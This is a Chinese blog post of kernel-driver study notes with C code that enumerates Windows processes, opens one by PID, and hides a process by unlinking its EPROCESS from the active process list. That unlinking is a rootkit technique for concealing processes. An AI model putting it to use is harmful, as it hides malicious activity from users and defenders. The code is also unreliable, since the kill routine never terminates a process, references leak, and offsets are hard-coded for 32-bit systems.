用到的结构体

http://www.irohane.top/index.php/archives/613/

用到的函数

http://www.irohane.top/index.php/archives/527/

http://www.irohane.top/index.php/archives/636/

image.png


  1. 使用 PsLookupProcessByProcessId 函数获取EPROCESS 来判断进程是否有效,返回值成功返回0
  2. EPROCESS 0xb4为进程IDUniqueProcessId; ,PsGetProcessImageFileName获取进程名
  3. EPROCESS 0xb8 为活动进程双向链表,可以对链表切断来达到进程隐藏
PEPROCESS D_LookupProcess(HANDLE hPid)    //获取EPROCESS 并判断进程是否存在
{
    PEPROCESS pEProcess = NULL;
    if (NT_SUCCESS(PsLookupProcessByProcessId(hPid, &pEProcess)))
    {
        return pEProcess;
    }
    return NULL;

}

VOID EnumProcess()    //枚举进程
{
    //DbgBreakPoint();
    PEPROCESS pEProc = NULL;
    PETHREAD pthread = NULL;
    //循环遍历进程
    ULONG id = 0;


    for (id = 4;id < 0x25600;id = id + 4)
    {
        //    根据PID返回PEPROCESS
        pEProc = D_LookupProcess((HANDLE)id);//强转
        if (!pEProc)
        {
            //如果没有就跳过本次
            continue;
        };
        //输出进程信息

        if (NT_SUCCESS(PsLookupProcessByProcessId(ULongToHandle(id), &pEProc)))
        {
            KdPrint(("EPROCESS = [%p] - PID = [%d] - Name =[%s]\n", pEProc, (*((UINT32*)((PUCHAR)pEProc + 0xb4))), PsGetProcessImageFileName(pEProc)));

            //引用计数减去1
            ObDereferenceObject(pEProc);
        }
    }
}



//结束进程

VOID KillProcess(UINT32 PID)
{
    HANDLE hProcess = NULL;
    CLIENT_ID Clientld = { 0 };
    OBJECT_ATTRIBUTES objAttribut = { sizeof(OBJECT_ATTRIBUTES) };
    Clientld.UniqueProcess = (HANDLE)PID;
    Clientld.UniqueThread = 0;
    //打进程如果有效就结束
    ZwOpenProcess(
        &hProcess,        //返回打开后的句柄 
        1,            //访问权限
        &objAttribut,        //对象属性
        &Clientld        //进程结构体
    );


}

//隐藏进程 简单的 摘链

VOID RemoveListEntry(PLIST_ENTRY ListEntry)
{
    KIRQL OldIrql;
    //提升中断权限
    OldIrql = KeRaiseIrqlToDpcLevel();
    //把当前链表摘除
    ListEntry->Flink->Blink = ListEntry->Blink;
    ListEntry->Blink->Flink = ListEntry->Flink;
    KeLowerIrql(OldIrql);
}

//隐藏进程仅限于任务栏
VOID HideProcess(int PID)
{
    PEPROCESS pEProc;
    if (NT_SUCCESS(PsLookupProcessByProcessId(ULongToHandle(PID), &pEProc)))
    {

        KdPrint(("EPROCESS = [%p] - PID = [%d] - Name =[%s]\n", pEProc, (DWORD32)PsGetProcessInheritedFromUniqueProcessId(pEProc), PsGetProcessImageFileName(pEProc)));

        //使用偏移方式进行
        RemoveListEntry((PLIST_ENTRY)((ULONG32)pEProc + PROCESS_ACTIVE_PROCESS_LINKS_OFFSET));
        //引用计数减去1
        ObDereferenceObject(pEProc);
    }

}
最后修改:2021 年 03 月 23 日 01 : 59 PM